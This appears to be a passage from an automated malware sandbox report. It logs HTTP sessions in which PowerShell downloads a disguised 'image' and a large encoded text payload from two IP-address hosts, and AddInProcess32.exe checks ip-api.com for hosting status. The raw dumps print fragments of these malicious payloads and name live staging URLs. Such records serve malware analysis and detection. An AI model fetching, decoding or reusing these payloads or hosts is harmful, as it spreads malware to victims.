                  Data Ascii: Bd4wBH8ACVIoERHoEF0RFCKRNCKRGCKRBdgwBWwhABACBAGoEBEOgRUBCc4QHSIAIGgAgBKRAhDYEVgQBdgQBdgQBdwXgRAYgSUQBF0hEdIxDHECC8FYEAGoEAGoEAGoEAGoEdAYgS0BgBKRHAGoEIUQHIAYgS0wBlgQBdIwBFgQgCKhAHYAC9JoECcgBOEQZBKRFO4gAAoAC5JR+BKhDd0agS4QANJRFGcgEIggDd4QANJRFOg
                  Jul 5, 2024 07:26:32.810734987 CEST896INData Raw: 51 42 4b 52 42 64 67 67 44 4f 34 41 57 42 4b 68 44 41 46 6f 45 42 30 6b 45 56 34 51 41 4e 4a 52 46 4e 63 77 48 49 67 67 44 64 67 67 44 64 67 67 44 64 34 51 48 56 47 6f 45 68 49 6f 45 4f 55 5a 67 53 45 69 67 53 34 67 44 64 34 51 48 4f 34 67 44 42
                  Data Ascii: QBKRBdggDO4AWBKhDAFoEB0kEV4QANJRFNcwHIggDdggDdggDd4QHVGoEhIoEOUZgSEigS4gDd4QHO4gDB0kEV4QHOUxBqgQeSkfgSknE5HoEOEQ4AGRFtGoEtGoEO4QANJRFOEQTSUxCHQCCOEQ4AGRFAFoEO4QANJRFAFoEB0kEVYwBZIAGBIAIFgACIIAAFgACO0BCOUQHIgAQBKBCIUQHF0BKBKhDlGoEY4AQBKRANJRFTc
                  Jul 5, 2024 07:26:32.810746908 CEST1236INData Raw: 41 54 45 77 45 41 4d 52 41 44 41 53 43 4f 34 67 44 44 6b 6b 67 53 55 42 43 49 4d 51 48 49 34 51 48 41 46 6f 45 4f 55 51 48 4f 34 67 44 64 34 41 43 4f 34 67 44 44 6b 6b 67 53 55 52 41 4e 4a 52 46 41 46 6f 45 4f 55 51 48 63 55 61 67 53 67 67 44 4f
                  Data Ascii: ATEwEAMRADASCO4gDDkkgSUBCIMQHI4QHAFoEOUQHO4gDd4ACO4gDDkkgSURANJRFAFoEOUQHcUagSggDO4wAJJoEVEQTSUBQBKRANJRFVcgPIAUgSEQTSUBQBKhDO4gDIAZgSgVgSUQHF0BQBKRANJRFO4wBkgQBdggAAYQUSEQAgUQRCGR0BKRUSEwAgsACVGoEBJoERHoEZIR3BKhDNHoEIcQFIAUgSEQTSUBQBKhDO4gDO4
                  Jul 5, 2024 07:26:32.810758114 CEST1236INData Raw: 45 42 30 6b 45 56 34 77 42 76 51 65 67 53 45 51 34 41 47 52 46 49 51 65 67 53 45 51 54 53 55 78 42 49 6b 41 35 42 4b 52 41 68 44 59 45 56 67 67 44 64 41 55 67 53 45 51 54 53 55 42 35 42 4b 42 51 42 4b 42 34 42 4b 68 44 4f 30 68 44 41 46 6f 45 42
                  Data Ascii: EB0kEV4wBvQegSEQ4AGRFIQegSEQTSUxBIkA5BKRAhDYEVggDdAUgSEQTSUB5BKBQBKB4BKhDO0hDAFoEB0kEV0wBqgACOMgDFcwBIMQHI4QHD0BCO0BQBKhDO0hDO0hDO0hDO4AQBKRANJRFOMxBkMQHBEAIFMACBACBIgACIMQHIgwBHoAHd4QAAUAHcwhDDAgBIwRHc0BCO0BCO0hDd4QHOggDO0hDd4QANJRFPcQHA4RAlF
                  Jul 5, 2024 07:26:32.810772896 CEST1236INData Raw: 41 67 6b 51 32 42 47 52 41 42 41 69 42 78 46 52 41 42 41 53 42 49 55 51 48 4f 30 63 67 53 34 51 30 42 4b 52 7a 42 4b 52 42 64 67 77 42 53 45 77 45 41 41 43 42 41 46 6f 45 4f 49 51 79 42 47 52 46 4a 45 77 45 41 4d 68 41 4a 48 59 45 56 41 41 49 4c
                  Data Ascii: AgkQ2BGRABAiBxFRABASBIUQHO0cgS4Q0BKRzBKRBdgwBSEwEAACBAFoEOIQyBGRFJEwEAMhAJHYEVAAILAUgS4gAFHoEVkQATAwECUcgSUBAgsAQBKhDCEcgRURCAFoEOIQvBKRFJ4gDC0lEVYgDOIQXSUhDCEcgRUBDBMBATIQwBGRFAAyCO4gAdJRFOIQvBKRFMEwEAMhA9GoEVAAILAUgS4gAdJRFIgAQBKhDCkcgRUxAdA
                  Jul 5, 2024 07:26:32.815367937 CEST1236INData Raw: 43 44 63 67 42 63 45 51 41 41 51 67 41 51 77 52 41 43 41 67 42 49 77 68 41 44 63 51 42 4e 45 51 41 67 51 51 56 42 4b 52 41 42 41 69 42 78 45 42 41 41 51 51 54 42 4b 42 41 67 55 41 43 59 34 41 43 45 63 67 42 49 67 41 57 52 67 56 45 45 63 41 43 51
                  Data Ascii: CDcgBcEQAAQgAQwRACAgBIwhADcQBNEQAgQQVBKRABAiBxEBAAQQTBKBAgUACY4ACEcgBIgAWRgVEEcACQJRAKQACQJBUSAlEEcQCMJRAKQAAeAgHA4BEA4xABABDIwkEMJBTSQwBJ4gDBIAIF4gDCIAAF4AHBACBBFoEAASBFFoEAASB9EoEAASBIUUgSUUgSIQQBKRQBKRPBKROBKBCHYBCY4QHI4QHFcQCIEQAAQAC1FRdRI


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.224916791.92.254.194801904C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:33.315924883 CEST83OUTGET /imge/new-image_v.jpg HTTP/1.1
                  Host: 91.92.254.194
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:33.970967054 CEST1236INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:33 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                  Last-Modified: Wed, 03 Jul 2024 13:17:15 GMT
                  ETag: "67fd9-61c57a629b9c6"
                  Accept-Ranges: bytes
                  Content-Length: 425945
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: image/jpeg
                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
                  Jul 5, 2024 07:26:33.970985889 CEST224INData Raw: 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04 05 2b
                  Data Ascii: C.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQ
                  Jul 5, 2024 07:26:33.971000910 CEST1236INData Raw: f7 72 19 58 8b 1d 70 91 49 4a 19 fa 9c ed 49 90 3a 84 7b de 2b e5 80 a4 69 24 84 28 5b 55 26 b1 97 89 c4 65 9c 52 a8 e0 63 10 ed 81 42 05 dc 3b 9f 7c 99 7c c4 47 60 39 ae 3e 18 09 92 b1 ed 61 5e 66 f6 f4 9e c0 67 e8 ef b0 7e 20 66 fd 90 f8 2f 84
                  Data Ascii: rXpIJI:{+i$([U&eRcB;||G`9>a^fg~ f/|Dt?Rsbo;if3fe~<().\U~n;T?WLYW,V;t?7 X~al{2&y!S4pjV3JEP JIw$8
                  Jul 5, 2024 07:26:33.971091032 CEST1236INData Raw: 17 e0 30 21 17 5c 80 44 59 58 aa 8a 05 ba 0c ed 60 f1 08 e0 43 3c 8a d1 83 6a 01 53 59 0b 04 b2 4b 61 f7 1b a0 72 35 ba 3d 42 c9 02 49 23 32 48 2b e0 0d e0 7a 7f d9 b2 ea a7 fb 63 e1 d2 19 14 e9 d5 a5 2c bb 85 9f dd 30 e9 9f 5e d2 f8 5e 87 c3 c6
                  Data Ascii: 0!\DYX`C<jSYKar5=BI#2H+zc,0^^AHq7[GWu:xR_2P00u>!%gj_YtVR, \^3x-Yb>?hF`ms0~~".C7mW4fgp~4q3
                  Jul 5, 2024 07:26:33.971102953 CEST1236INData Raw: 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 64 e5 58 1e 7d b3 c1 69 f4 cd ad fb 40 9a 7b 12 c1 09 34 5b a0 5e b9 ec 5e 3f bc a3 23
                  Data Ascii: W(=+EDhyS+z`a(hdX}i@{4[^^?#nx!x9,z"Ta~C!C3@8`mFfYk0?g3OWa4vA{`)D^*'8^U]H,^`&!Sgk&iNTS3B
                  Jul 5, 2024 07:26:33.971158981 CEST672INData Raw: d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f
                  Data Ascii: fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b
                  Jul 5, 2024 07:26:34.050098896 CEST1236INData Raw: 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db
                  Data Ascii: fcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                  Jul 5, 2024 07:26:34.050221920 CEST1236INData Raw: b4 b7 5c 10 66 00 ed 41 c7 52 70 04 94 d3 2d 1d a4 b1 fe 43 3e e1 f6 47 4a fa 8f d9 77 85 42 8c 81 a6 f1 2d 44 44 c8 c1 7f 1e 9e 64 ee 47 f8 bf f7 e9 9f 0d 7b 0e 18 2f 3f a6 7d ab ec 46 a3 4e 9f b2 c8 75 5a e7 61 1c 3e 36 d2 46 b1 d1 26 a2 06 8f
                  Data Ascii: \fARp-C>GJwB-DDdG{/?}FNuZa>6F&,5UjRG"*{w9?j_H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:$
                  Jul 5, 2024 07:26:34.050231934 CEST1236INData Raw: cd 75 46 06 58 be fd 14 a5 18 f4 a8 82 d7 d6 b3 16 27 94 fd a0 d5 b0 1b a4 30 81 ea eb d1 70 32 cc c7 c6 4b 95 0a 46 a2 1b 1d ba 1c 0f 4b f6 cb c7 a2 d4 f8 bf 86 6b 22 13 2a ab 02 c8 c4 15 0a ac ad c5 73 d8 67 ae 97 ed 8e 88 23 21 d3 3b 29 17 b8
                  Data Ascii: uFX'0p2KFKk"*sg#!;)|+MYe6]M}GBV)/n^X f{ U/Mv0nQ)R{dvhn C_oz>hqw>qJh,O]4(M3=$prNHs1ixp}
                  Jul 5, 2024 07:26:34.050237894 CEST672INData Raw: d4 1c 0f 4e 9f 69 74 e0 12 21 90 df 52 5b ae 43 f8 ee 9e 48 c0 30 c8 2f b8 6a 39 85 0c 04 8d bd 47 be 1a 5d 2b 42 02 b9 36 39 aa c0 d9 8b c5 b4 0e a5 3c 89 41 5f e2 26 f0 4d e2 30 ed 67 11 b5 76 e4 0f ae 66 42 db 45 91 57 c5 e1 9d 4a a8 25 41 07
                  Data Ascii: Nit!R[CH0/j9G]+B69<A_&M0gvfBEWJ%A(F ey{=^,<7Rg:)%Y14eJ<auz})TI"p=Fqp0kfpU|/e>Oq};3FYmxa|I'4J:B=
                  Jul 5, 2024 07:26:34.050304890 CEST1236INData Raw: 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38
                  Data Ascii: @g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#x`}lhHESFn<u9$<X*6g&G?oVhm['Sj~(|mV&4z!#n9


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.2249168208.95.112.1803108C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:34.303406000 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:34.778690100 CEST175INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:34 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 55
                  X-Rl: 43
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false
                  Jul 5, 2024 07:26:34.991076946 CEST175INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:34 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 55
                  X-Rl: 43
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.2249169198.46.178.144801904C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:34.925609112 CEST88OUTGET /madamwebbbbbbbas6444.txt HTTP/1.1
                  Host: 198.46.178.144
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:35.425679922 CEST1236INHTTP/1.1 200 OK
                  Content-Type: text/plain
                  Last-Modified: Tue, 02 Jul 2024 09:00:11 GMT
                  Accept-Ranges: bytes
                  ETag: "96b1143f5eccda1:0"
                  Server: Microsoft-IIS/10.0
                  Date: Fri, 05 Jul 2024 05:26:35 GMT
                  Content-Length: 325632
                  Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8DUAAAAMAwAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgCN4TesJWblN3ch9CPK0gPvZmbJR3c1JHdvwDIgoQD+kHdpJXdjV2cvwDIgACIK0gPzV2ZlxWa2lm
                  Jul 5, 2024 07:26:35.425693989 CEST224INData Raw: 63 51 52 57 5a 30 4e 58 5a 31 46 58 5a 79 39 43 50 67 41 43 49 67 41 43 49 4b 30 67 50 76 49 53 5a 7a 78 57 59 6d 4a 53 50 7a 4e 58 5a 6a 4e 57 51 70 56 48 49 69 49 58 5a 72 39 6d 64 75 6c 30 63 68 4a 53 50 73 56 6d 64 6c 78 47 49 73 56 6d 64 6c
                  Data Ascii: cQRWZ0NXZ1FXZy9CPgACIgACIK0gPvISZzxWYmJSPzNXZjNWQpVHIiIXZr9mdul0chJSPsVmdlxGIsVmdlxkbvlGd1NWZ4VEZlR3clVXclJHPgACIgACIgAiCN4jIzYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegMXZnVGbpZXayBFZlR3clVXclJHPgACIgACIK0gP5RXayV3
                  Jul 5, 2024 07:26:35.425703049 CEST1236INData Raw: 59 6c 4e 48 50 67 41 43 49 67 6f 51 44 2b 49 69 4d 32 35 53 62 7a 46 6d 4f 74 39 32 59 74 51 6e 5a 76 4e 33 62 79 4e 57 61 74 31 79 63 68 31 57 5a 6f 4e 32 63 36 34 6d 63 31 4a 53 50 7a 35 47 62 74 68 48 49 76 5a 6d 62 4a 52 33 63 31 4a 48 64 38
                  Data Ascii: YlNHPgACIgoQD+IiM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHIvZmbJR3c1JHd8ACIK0gPvICcwFmLu9Wa0F2YpxGcwFUeNJSPl1WYuBiIw4CMuAjLxISPu9WazJXZ2BSe0lGduVGZJlHbi1WZzNXY8ACIK0gPiAjLxISPu9WazJXZWR3clZWauFWbgISM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN
                  Jul 5, 2024 07:26:35.425930977 CEST1236INData Raw: 41 41 41 77 54 41 59 45 41 4f 42 51 53 41 38 46 41 4f 42 77 54 41 6b 45 41 54 42 67 55 41 55 45 41 57 42 77 58 41 4d 46 41 57 42 41 41 41 51 6a 41 38 43 41 41 41 41 41 41 41 41 41 41 41 41 51 41 71 44 77 41 6a 7a 46 41 41 41 41 41 41 41 41 41 41
                  Data Ascii: AAAwTAYEAOBQSA8FAOBwTAkEATBgUAUEAWBwXAMFAWBAAAQjA8CAAAAAAAAAAAAQAqDwAjzFAAAAAAAAAAAAACwLADAOoAAAAQCAAAAAABAAAAAAAAAAAAAAAAAAAACAAoBAAAEAABAAAAAAAAAAAAAAAAAAAAAAAACAAAAAABAAAAAAAAAAAAAAAAAAAACAA4AAAAEAABAAAAAAAAAAAAAAAAAAAACAAQBAAAgBgAAAIAAAAQA
                  Jul 5, 2024 07:26:35.425941944 CEST1236INData Raw: 49 4d 55 49 67 53 41 41 41 46 6b 76 67 53 59 41 42 4b 6b 76 67 53 45 67 41 67 63 51 39 43 4b 52 48 41 41 69 42 4e 4d 6f 45 42 4d 6f 45 42 41 41 43 49 67 51 41 43 41 53 42 46 4d 59 45 41 41 53 42 4a 4d 6f 45 41 41 51 42 49 55 77 67 52 55 77 67 52
                  Data Ascii: IMUIgSAAAFkvgSYABKkvgSEgAgcQ9CKRHAAiBNMoEBMoEBAACIgQACASBFMYEAASBJMoEAAQBIUwgRUwgRUwgRUwgRkhEZIRADKR/CKRgAKR+CKR9CKR8CKR7CGhDHgCCI0hEF0BBHgAHCEAAEgQRBKhDxKoEOEugSYwBO4Q6CKRAgYQ5CKBAgUACxKoEBUrgSUhDxKoE9EoEhLoEOcwBWkIgSAAAF4QLBKRHBAwBIgQLBKRHtE
                  Jul 5, 2024 07:26:35.425951958 CEST1236INData Raw: 42 64 34 77 42 48 38 41 43 56 49 6f 45 52 48 6f 45 46 30 52 46 43 4b 52 4e 43 4b 52 47 43 4b 52 42 64 67 77 42 57 77 68 41 42 41 43 42 41 47 6f 45 42 45 4f 67 52 55 42 43 63 34 51 48 53 49 41 49 47 67 41 67 42 4b 52 41 68 44 59 45 56 67 51 42 64
                  Data Ascii: Bd4wBH8ACVIoERHoEF0RFCKRNCKRGCKRBdgwBWwhABACBAGoEBEOgRUBCc4QHSIAIGgAgBKRAhDYEVgQBdgQBdgQBdwXgRAYgSUQBF0hEdIxDHECC8FYEAGoEAGoEAGoEAGoEdAYgS0BgBKRHAGoEIUQHIAYgS0wBlgQBdIwBFgQgCKhAHYAC9JoECcgBOEQZBKRFO4gAAoAC5JR+BKhDd0agS4QANJRFGcgEIggDd4QANJRFOg
                  Jul 5, 2024 07:26:35.425961971 CEST1236INData Raw: 51 42 4b 52 42 64 67 67 44 4f 34 41 57 42 4b 68 44 41 46 6f 45 42 30 6b 45 56 34 51 41 4e 4a 52 46 4e 63 77 48 49 67 67 44 64 67 67 44 64 67 67 44 64 34 51 48 56 47 6f 45 68 49 6f 45 4f 55 5a 67 53 45 69 67 53 34 67 44 64 34 51 48 4f 34 67 44 42
                  Data Ascii: QBKRBdggDO4AWBKhDAFoEB0kEV4QANJRFNcwHIggDdggDdggDd4QHVGoEhIoEOUZgSEigS4gDd4QHO4gDB0kEV4QHOUxBqgQeSkfgSknE5HoEOEQ4AGRFtGoEtGoEO4QANJRFOEQTSUxCHQCCOEQ4AGRFAFoEO4QANJRFAFoEB0kEVYwBZIAGBIAIFgACIIAAFgACO0BCOUQHIgAQBKBCIUQHF0BKBKhDlGoEY4AQBKRANJRFTc
                  Jul 5, 2024 07:26:35.425977945 CEST1236INData Raw: 41 4e 4a 52 46 4a 63 67 4a 49 6b 59 67 53 6b 59 67 53 45 77 41 41 6f 41 43 4f 55 68 67 53 55 51 48 52 48 6f 45 56 49 6f 45 46 30 52 42 64 55 51 48 46 30 52 42 64 55 6a 67 53 55 51 48 4e 63 67 48 49 67 67 44 44 34 67 44 47 63 41 43 46 67 51 41 41
                  Data Ascii: ANJRFJcgJIkYgSkYgSEwAAoACOUhgSUQHRHoEVIoEF0RBdUQHF0RBdUjgSUQHNcgHIggDD4gDGcACFgQAAQACAFoEI4QHF0RBdgACF0hDAFoEB0kEV4ADHoBCIgQHIgQHI0BCdgACdgACIgQHI0hDPcAGIgQBdgwAgcgCIEAAEEjgR0igRkigR4QAEASDIAUgSEQ4AGRFOEQ4AGRFOEQ4AGRFOEQ4AGRFAFoEB0kEVAUgSIgDIg
                  Jul 5, 2024 07:26:35.426008940 CEST1236INData Raw: 67 53 55 42 41 65 45 51 54 53 55 52 41 42 41 42 45 4f 45 67 43 44 67 41 41 65 45 51 5a 42 4b 52 46 41 34 52 41 6c 46 6f 45 56 49 51 41 51 49 68 44 49 45 41 49 45 67 77 41 49 34 67 44 49 34 67 44 49 34 41 43 49 34 51 41 4e 4a 52 46 49 34 51 41 4e
                  Data Ascii: gSUBAeEQTSURABABEOEgCDgAAeEQZBKRFA4RAlFoEVIQAQIhDIEAIEgwAI4gDI4gDI4ACI4QANJRFI4QANJRFD4QANJRFOIxBggACIgABHYAHO4gAAUACOEAAEwhDcIAIFgACO0BQBKRANJRFAFoEO4gDOUagS4QpBKhDAFoEB0kEV4wBjEdgSAAIFgQBd4QACKRBd0cgSUQHHcAEIggDdAUgSUQHlGoEOUagS4AQBKRANJRFKc
                  Jul 5, 2024 07:26:35.426019907 CEST1236INData Raw: 41 67 59 51 73 42 4b 42 41 67 55 67 44 74 47 6f 45 42 41 69 42 49 4d 51 48 41 46 6f 45 42 30 6b 45 56 41 55 67 53 34 67 44 4f 67 41 57 42 4b 68 44 4f 34 41 51 42 4b 52 41 4e 4a 52 46 4e 63 41 49 44 30 68 44 64 45 41 49 47 67 77 41 64 41 55 67 53
                  Data Ascii: AgYQsBKBAgUgDtGoEBAiBIMQHAFoEB0kEVAUgS4gDOgAWBKhDO4AQBKRANJRFNcAID0hDdEAIGgwAdAUgSEQTSUBQBKRHS0hEO4QHOUagSAUgSEQTSUxCHECCFEAAEgACF0xAHYACDEAAEUQHC4QpBKRAgYQpBKhBEgwAdMQHD0BCO0BCO0BCO0hDdAUgSUQHOUagS4QpBKhDlGoEOUQHO0BQBKRANJRFXcQMdGoEAASBAMRHAA
                  Jul 5, 2024 07:26:35.430524111 CEST1236INData Raw: 49 45 67 68 42 42 41 41 42 63 67 51 41 41 51 41 47 4f 45 41 41 45 6b 6c 45 59 77 68 41 41 59 51 44 42 47 52 57 53 45 41 41 48 67 52 41 42 41 43 42 49 67 51 42 64 67 52 41 45 41 41 43 49 4d 51 48 49 45 51 67 53 67 52 42 64 67 53 45 59 67 42 48 39
                  Data Ascii: IEghBBAABcgQAAQAGOEAAEklEYwhAAYQDBGRWSEAAHgRABACBIgQBdgRAEAACIMQHIEQgSgRBdgSEYgBH9DoEcwRDHYhDIEAAEEPgSAAAFggDdIwBFgQdR4QHOQwBIAdgSEQ4AGRFIAwEBEAIFkOgSAAAF4QANJRFFwWgSEQ4AGRFIwWgSEQTSUxBQHoEB0kEVcAC1FhDdAdgSEQ4AGRFsFoEBEOgRUB0BKB0BKBbBKB0BKRANJ


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.224917091.92.254.194801904C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:35.948004007 CEST59OUTGET /imge/new-image_v.jpg HTTP/1.1
                  Host: 91.92.254.194
                  Jul 5, 2024 07:26:36.578052998 CEST1236INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:36 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                  Last-Modified: Wed, 03 Jul 2024 13:17:15 GMT
                  ETag: "67fd9-61c57a629b9c6"
                  Accept-Ranges: bytes
                  Content-Length: 425945
                  Content-Type: image/jpeg
